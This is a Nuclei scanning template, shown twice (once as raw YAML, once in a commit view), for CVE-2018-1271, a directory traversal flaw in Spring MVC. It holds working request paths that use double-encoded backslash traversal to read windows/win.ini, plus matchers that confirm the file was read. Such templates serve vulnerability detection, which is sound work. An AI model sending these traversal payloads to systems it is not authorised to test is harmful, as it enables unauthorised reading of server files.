nuclei-templates/cves/CVE-2018-1271.yaml

id: CVE-2018-1271

info:
  name: Spring MVC Directory Traversal Vulnerability
  author: hetroublemakr
  severity: High
  # reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d

requests:
  - method: GET
    path:
      - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
      - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
    matchers:
      - type: word
        words:
          - 'for 16-bit app support'
      - type: status
        status:
          - 200
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00			`id: CVE-2018-1271`

			`info:`
			`name: Spring MVC Directory Traversal Vulnerability`
			`author: hetroublemakr`
			`severity: High`
			`# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'`
			`- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'`
			`matchers:`
			`- type: word`
			`words:`
			`- 'for 16-bit app support'`
			`- type: status`
			`status:`
			`- 200`